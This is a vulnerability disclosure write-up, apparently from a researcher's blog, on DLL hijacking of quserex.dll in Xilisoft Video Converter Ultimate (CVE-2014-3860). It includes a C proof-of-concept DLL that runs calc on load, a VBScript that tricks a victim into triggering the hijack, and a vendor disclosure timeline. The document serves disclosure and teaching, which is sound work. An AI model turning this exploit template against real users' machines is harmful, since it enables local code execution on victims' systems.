Xilisoft Video Converter Ultimate DLL Hijacking

Overview of Xilisoft Video Converter Ultimate

Xilisoft Video Converter Ultimate is a professional video converter which has a wide range of video and audio formats. I personally love this software since it uses GPU acceleration in converting videos.

It is on the high side of premium video converters for home use. It automatic profiles enhanced for just any device or format, graphics card detection and acceleration.
-CNET

Arbitrary DLL Injection Code Execution

Xilisoft Video Converter Ultimate is prone to a flaw in the way it dynamically loads the quserex.dll library. Since the program is not specified with a fully qualified path name the program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program will load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privilege of the program or user executing the program. This attack can be leveraged remotely in some cases by placing the malicious file or library on a network share or extracted archive downloaded from a remote source. This can be done by tricking a user into running a hostile script from the local file system or a USB drive in some cases. This attack scenario is certainly possible, but rare.

View post on imgur.com

  1. The directory from which the application loaded. = C:\Program Files\Xilisoft\Video Converter Ultimate\QSEREX.DLL
  2. The system directory. = C:\WINDOWS\system32\QSEREX.DLL
  3. The 16-bit system directory. = C:\WINDOWS\system\QSEREX.DLL
  4. The Windows directory. = C:\WINDOWS\QSEREX.DLL
  5. The current directory. = C:\Documents and Settings\Osanda\Desktop\New Folder\QSEREX.DLL

What we can understand is that application searches QSEREX.DLL in the current directory which is a New Folder in the Desktop in this case.

Vulnerable Executables:

  • vcloader.exe
  • vc.exe
  • vc_buy.exe

Vulnerability Information

Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-3860

Proof of Concept

[code language=”c”]
/*
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)
* Tested on: Windows XP SP2 en
* Vendor: http://www.xilisoft.com/
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
* CVE: CVE-2014-3860
*/
/*
Vulnerable Executables:
1. vcloader.exe
2. vc.exe
3. vc_buy.exe
*/
#include <windows.h>
int pwned()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
pwned();
return 0;
}
[/code]

View post on imgur.com

Automation

As this application as no extensions associated we have to manually a open a file with this application. So we can automate this process by writting something like this 😉 Place the DLL and this script in the same location. Once the victim runs this script the DLL will be hijacked.

[code language=”vb”]
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
‘ Path to Xilisoft Video Converter
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file
[/code]

Disclosure Timeline

2014-04-20 : Contacted the vendor
2014-04-23 : Contacted again as I did not recieve any reply
2014-04-24 : Recieved a response saying that it was forwarded to technicians
2014-05-16 : Contacted again since there is was reply
2014-05-20 : Recieved a response saying that they cannot reproduce
2014-06-01 : Contacted MITRE
2014-06-02 : Public disclosure
http://packetstormsecurity.com/files/126882/Xilisoft-Video-Converter-Ultimate-7.8.1-build-20140505-DLL-Hijacking.html

Leave a Reply